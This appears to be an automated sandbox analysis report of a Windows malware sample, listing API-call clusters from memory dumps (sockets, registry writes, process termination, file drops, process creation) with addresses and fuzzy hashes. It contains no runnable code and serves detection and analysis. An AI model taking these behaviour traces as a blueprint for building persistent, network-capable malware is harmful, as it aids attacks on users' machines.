                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: sendto$CriticalSectionhtons$EnterExitFreeGlobalLeaveThreadUserselectsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 4130859867-0
                                                                                                            • Opcode ID: 109baa28321bcaac94c075e8508ec6793b0c22590d218294f7d9719b20ff4939
                                                                                                            • Instruction ID: 92029c2db5432cddf465b50bb2d071cb9f2e042ccfa2fe128723d0a49d9c1268
                                                                                                            • Opcode Fuzzy Hash: 109baa28321bcaac94c075e8508ec6793b0c22590d218294f7d9719b20ff4939
                                                                                                            • Instruction Fuzzy Hash: 5A915975E04208BBEB04DBA4CC95FFEB7B5FF48700F148699E615AB281E7B59A40CB50
                                                                                                            APIs
                                                                                                              • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00902D24
                                                                                                            • lstrcat.KERNEL32(00000000,008F3DFC), ref: 00902D86
                                                                                                            • lstrcat.KERNEL32(00000000,008F3E00), ref: 00902D98
                                                                                                            • lstrcat.KERNEL32(00000000,008F3E04), ref: 00902DC1
                                                                                                            • lstrlen.KERNEL32(00000000,%s,00903658,?,?,?,?,?,?), ref: 00902DD7
                                                                                                            • wsprintfA.USER32 ref: 00902DE5
                                                                                                            • lstrcat.KERNEL32(?,00000000), ref: 00902DF9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$ExchangeInterlockedlstrcpylstrlenwsprintf
                                                                                                            • String ID: %s
                                                                                                            • API String ID: 3923932729-3043279178
                                                                                                            • Opcode ID: a4b28fe99423cbeccafe78879de280020ccc21ca3737130950d3734675268491
                                                                                                            • Instruction ID: c10d1d1cb45f1fb9e22938bb15816f7079584ddd1fbcfff53e4ed56bf10781f4
                                                                                                            • Opcode Fuzzy Hash: a4b28fe99423cbeccafe78879de280020ccc21ca3737130950d3734675268491
                                                                                                            • Instruction Fuzzy Hash: 7B3181B690112C9FDB24EB64DD8ABF97375FF98300F1085A5E719D21C0DA349E958FA0
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 008FA6E6
                                                                                                            • lstrlen.KERNEL32(?,008F26B8,00000000), ref: 008FA6F8
                                                                                                            • wsprintfA.USER32 ref: 008FA704
                                                                                                            • GetTickCount.KERNEL32 ref: 008FA6C5
                                                                                                              • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
                                                                                                            • GetTickCount.KERNEL32 ref: 008FA70F
                                                                                                            • GetTickCount.KERNEL32 ref: 008FA730
                                                                                                            • lstrlen.KERNEL32(?,008F26B0,00000000), ref: 008FA742
                                                                                                            • wsprintfA.USER32 ref: 008FA74E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$lstrlenwsprintf$ExchangeInterlocked
                                                                                                            • String ID:
                                                                                                            • API String ID: 2702386088-0
                                                                                                            • Opcode ID: db3520f52dec0742960b1c119f3e405782d3218a15484d9fdabc8d470f099751
                                                                                                            • Instruction ID: a626093987d7aec31397aba09f2e3d07de101e232ddb718b66cb79966c56477d
                                                                                                            • Opcode Fuzzy Hash: db3520f52dec0742960b1c119f3e405782d3218a15484d9fdabc8d470f099751
                                                                                                            • Instruction Fuzzy Hash: 242175B6602118BBDF14ABB8DC4DEBA37A9FF49341F045626FB1DC3251DA35D90087A2
                                                                                                            APIs
                                                                                                            • GetTempPathA.KERNEL32(00000080,00000000,?), ref: 008FA78C
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 008FA796
                                                                                                            • lstrcat.KERNEL32(00000000,008F3CC0), ref: 008FA7B2
                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FA7CF
                                                                                                            • lstrlen.KERNEL32(00000000,008F2880,00000000), ref: 008FA7FD
                                                                                                            • wsprintfA.USER32 ref: 008FA809
                                                                                                            • lstrlen.KERNEL32(00000000,008F288C,00000000), ref: 008FA826
                                                                                                            • wsprintfA.USER32 ref: 008FA832
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$wsprintf$PathTemplstrcatlstrcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 2776683041-0
                                                                                                            • Opcode ID: 360c5ebdedcef77ee8c19fd1d27f62b3cfd89d63db90a06713a2c737b35c9e11
                                                                                                            • Instruction ID: 3ebfebf5dea7502680efe20b426e4d3b800378959a98686a9ea4695494b73c78
                                                                                                            • Opcode Fuzzy Hash: 360c5ebdedcef77ee8c19fd1d27f62b3cfd89d63db90a06713a2c737b35c9e11
                                                                                                            • Instruction Fuzzy Hash: 2721B8B9600108BBDF04DB64DC88BFA7779FF48300F008255FB09C7250DA749980CB91
                                                                                                            APIs
                                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 008F6F1C
                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 008F6F7A
                                                                                                            • select.WS2_32(?,00000000,00000000,00000000,00000014), ref: 008F7052
                                                                                                            • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 008F7081
                                                                                                            • closesocket.WS2_32(?), ref: 008F7185
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: closesocketrecvfromselectsendtosocket
                                                                                                            • String ID: @
                                                                                                            • API String ID: 4198204009-2766056989
                                                                                                            • Opcode ID: b3bbb44ecd5fb7d0477ecc7b55607378c561bac1ef54ca960bfd12f3ef7a5bfd
                                                                                                            • Instruction ID: 465efa2eba28571f104448c49d7eec20a6339093870b7443f1e0f8e6108484b2
                                                                                                            • Opcode Fuzzy Hash: b3bbb44ecd5fb7d0477ecc7b55607378c561bac1ef54ca960bfd12f3ef7a5bfd
                                                                                                            • Instruction Fuzzy Hash: E5712871D0826CAAEB28CB24CC55BF9B775FB48344F5042E9E39DA6180DBB05EC98F51
                                                                                                            APIs
                                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 008F7580
                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 008F75D1
                                                                                                            • select.WS2_32(?,00000000,00000000,00000000,0000001E), ref: 008F76A9
                                                                                                            • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 008F76D8
                                                                                                            • closesocket.WS2_32(000000FF), ref: 008F7768
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: closesocketrecvfromselectsendtosocket
                                                                                                            • String ID: @
                                                                                                            • API String ID: 4198204009-2766056989
                                                                                                            • Opcode ID: 7b9b4dc64e815b89a5fbc06f8cbf3377648e6dd44421e8e68c1ffdb59216cf3f
                                                                                                            • Instruction ID: a0ecf5078009666166b795a9bf952149de32adfcc3a5480ad86d6f3c631ce00c
                                                                                                            • Opcode Fuzzy Hash: 7b9b4dc64e815b89a5fbc06f8cbf3377648e6dd44421e8e68c1ffdb59216cf3f
                                                                                                            • Instruction Fuzzy Hash: 205117749082AC9BEB28CB24CC95BE9B7B5FB45304F5081D9E39DE6280DBB45EC48F50
                                                                                                            APIs
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00902A4E
                                                                                                              • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
                                                                                                            • lstrcat.KERNEL32(00000000,008F3DE0), ref: 00902A7C
                                                                                                            • lstrcat.KERNEL32(00000000,008F3DE4), ref: 00902AA2
                                                                                                            • lstrcat.KERNEL32(00000000,008F3DE8), ref: 00902AB1
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00902B0C
                                                                                                            • lstrcat.KERNEL32(00000000,008F3DEC), ref: 00902B40
                                                                                                            • lstrcat.KERNEL32(00000000,008F3DF0), ref: 00902B66
                                                                                                            • lstrcat.KERNEL32(00000000,008F3DF4), ref: 00902B83
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$lstrlen$ExchangeInterlocked
                                                                                                            • String ID:
                                                                                                            • API String ID: 3054446656-0
                                                                                                            • Opcode ID: f251652526d4e74584778829c1695ffec40149a62fe5c5f81f76b67af7039f1c
                                                                                                            • Instruction ID: 53b48b77f554ce7ed059a4092d2b22657bd48de8755cb458136dd99342c8c000
                                                                                                            • Opcode Fuzzy Hash: f251652526d4e74584778829c1695ffec40149a62fe5c5f81f76b67af7039f1c
                                                                                                            • Instruction Fuzzy Hash: E2317276A01148ABCB14EF64DC8ABBE7B66FF84700F148525F605D6681CA3CD9808B55
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(008F26E0,40000000,00000000,00000000,00000003,00000000,00000000,?,008F9E89), ref: 008F9AF1
                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,000000FF), ref: 008F9B0B
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 008F9B20
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008F9B2A
                                                                                                            • WriteFile.KERNEL32(000000FF,000000FF,00000004,00000000,00000000), ref: 008F9B42
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 008F9B4C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFileHandleProcess$CreateOpenTerminateWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 2603052737-0
                                                                                                            • Opcode ID: f654683e624398c6da07112a075f405d24bf6eb2b5841f7e47f6a81e9010c0dc
                                                                                                            • Instruction ID: 5fc2175eefcec5dadf3dc70ea64a3937851373f7eb207c618f1fdbb8c9abc4b5
                                                                                                            • Opcode Fuzzy Hash: f654683e624398c6da07112a075f405d24bf6eb2b5841f7e47f6a81e9010c0dc
                                                                                                            • Instruction Fuzzy Hash: 5401C575A41208BBEB10EBA0EC4DFA97B78BB48711F108249F715AA2D0D6B46A84CB54
                                                                                                            APIs
                                                                                                            • wsprintfA.USER32 ref: 008F4F6B
                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 008F4FFF
                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 008F5021
                                                                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 008F504B
                                                                                                            • lstrlen.KERNEL32(?), ref: 008F505A
                                                                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 008F507A
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008F508C
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 008F5100
                                                                                                            • wsprintfA.USER32 ref: 008F5153
                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 008F518F
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 008F543A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Value$Closelstrcpywsprintf$FreeGlobalQuerylstrlen
                                                                                                            • String ID: joneC:\Windows\
                                                                                                            • API String ID: 3359840872-2213015650
                                                                                                            • Opcode ID: 7149003c00484b7ca84b18579cfce9d778fef1246bbf9a4f02ba99f938c98f9e
                                                                                                            • Instruction ID: 652bae0827217ff2e87231c9d7245f6645ef12cf607e8d1fcdd788a99396b65c
                                                                                                            • Opcode Fuzzy Hash: 7149003c00484b7ca84b18579cfce9d778fef1246bbf9a4f02ba99f938c98f9e
                                                                                                            • Instruction Fuzzy Hash: B6419FB590592CDBCB20DF60CC85AF9B775FF58305F0882CAE319A6240DA725B84DF51
                                                                                                            APIs
                                                                                                              • Part of subcall function 008F7FA9: select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 008F80DA
                                                                                                            • GlobalAlloc.KERNEL32(00000040,-00000C00,?,?,?,?), ref: 008F81A1
                                                                                                            • recv.WS2_32(00000000,00000008,00000400,00000000), ref: 008F81F0
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 008F8247
                                                                                                            • send.WS2_32(00000000,00000000,?,00000000), ref: 008F826D
                                                                                                            • closesocket.WS2_32(000000FF), ref: 008F8283
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFreeclosesocketrecvselectsend
                                                                                                            • String ID:
                                                                                                            • API String ID: 424924859-0
                                                                                                            • Opcode ID: 0c9734ad8d75a15e2875e480b496053d7ac43c34c2dfe889056c44d04eb6a331
                                                                                                            • Instruction ID: 48eb501c917392b6715436a5f96b3d4593762b6c3ab9293473a2c71cf8b755a8
                                                                                                            • Opcode Fuzzy Hash: 0c9734ad8d75a15e2875e480b496053d7ac43c34c2dfe889056c44d04eb6a331
                                                                                                            • Instruction Fuzzy Hash: E0416C7190021CEBDF24CBA4CC48BAAB375FB44305F108299E749E6291DF74AE84CF51
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,00000080), ref: 008F9322
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 008F932F
                                                                                                            • lstrcat.KERNEL32(00000000,008F3C90), ref: 008F934E
                                                                                                            • lstrcat.KERNEL32(00000000,008F2288), ref: 008F9362
                                                                                                            • lstrcat.KERNEL32(00000000,008F268C), ref: 008F9375
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$DirectorySystemlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3692445580-0
                                                                                                            • Opcode ID: 547eb02a2501485a01287f2205ace51382dec51a180088173c8af4c6612e03de
                                                                                                            • Instruction ID: 87c600016ed87884ba091aa4a6c9b0cb0b131f41570a1f86a4a35ab03ee6910d
                                                                                                            • Opcode Fuzzy Hash: 547eb02a2501485a01287f2205ace51382dec51a180088173c8af4c6612e03de
                                                                                                            • Instruction Fuzzy Hash: 952160B9A10218BFCB10DB68EC48BA97778BF48701F008299F709A3190CB705A85CF64
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00001000), ref: 008F945E
                                                                                                            • Sleep.KERNEL32(00000080), ref: 008F947B
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 008F9495
                                                                                                            • Sleep.KERNEL32(0002D000), ref: 008F94BF
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008F94EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$ExitThreadUserlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3026710222-0
                                                                                                            • Opcode ID: ca5fe6561d44cc7833154105d737c039e38f09865f202016fe36a45130403433
                                                                                                            • Instruction ID: 90d2e3779502453debc79a5b6b24897924616035f39a54f7772be8524ce6b9c3
                                                                                                            • Opcode Fuzzy Hash: ca5fe6561d44cc7833154105d737c039e38f09865f202016fe36a45130403433
                                                                                                            • Instruction Fuzzy Hash: 0F217970A4420CABDF109FE4EC09BAAB7B4FB29755F10821AE616E63D0CB795401CBA5
                                                                                                            APIs
                                                                                                            • lstrlen.KERNEL32(?), ref: 00900C6E
                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000022,00000000), ref: 00900CA0
                                                                                                            • WriteFile.KERNEL32(?,004A0770,0001E200,?,00000000), ref: 00900CC6
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00900CD0
                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 00900CDA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCloseCreateHandleWritelstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 96072700-0
                                                                                                            • Opcode ID: adf994dfe68375553cc55a39ae55e6bdf86bf7b702d33bcbf2c701f92eaea4c8
                                                                                                            • Instruction ID: 6aff31e4662db7f0e04081aebe963dbeee4469da7f6a7f6514ec025101d2fc95
                                                                                                            • Opcode Fuzzy Hash: adf994dfe68375553cc55a39ae55e6bdf86bf7b702d33bcbf2c701f92eaea4c8
                                                                                                            • Instruction Fuzzy Hash: 83116075614218FFEB10CFA4DC89BAD7B78FF88711F208755E645DA2C0D7349A809B50
                                                                                                            APIs
                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 008FA220
                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 008FA236
                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 008FA24A
                                                                                                            • Sleep.KERNEL32(00002800), ref: 008FA255
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008FA25F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesDeleteExitSleepThreadUserlstrcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 1172011736-0
                                                                                                            • Opcode ID: b9f9f9bb1df807ac620520bdbd0665170d28466d0256ab6c6485c59378888c37
                                                                                                            • Instruction ID: 60edaa9b2558aa708cf96d35d52f786fb75a50320a59bbe48c78d364af7557b2
                                                                                                            • Opcode Fuzzy Hash: b9f9f9bb1df807ac620520bdbd0665170d28466d0256ab6c6485c59378888c37
                                                                                                            • Instruction Fuzzy Hash: 6FF02835A00208ABEF149BB4DC4CBB67778FF54310F0002A6E716C1191DF329944CB52
                                                                                                            APIs
                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 008F46EE
                                                                                                            • lstrlen.KERNEL32(?), ref: 008F46FB
                                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 008F476E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcesslstrcpylstrlen
                                                                                                            • String ID: D
                                                                                                            • API String ID: 2742767947-2746444292
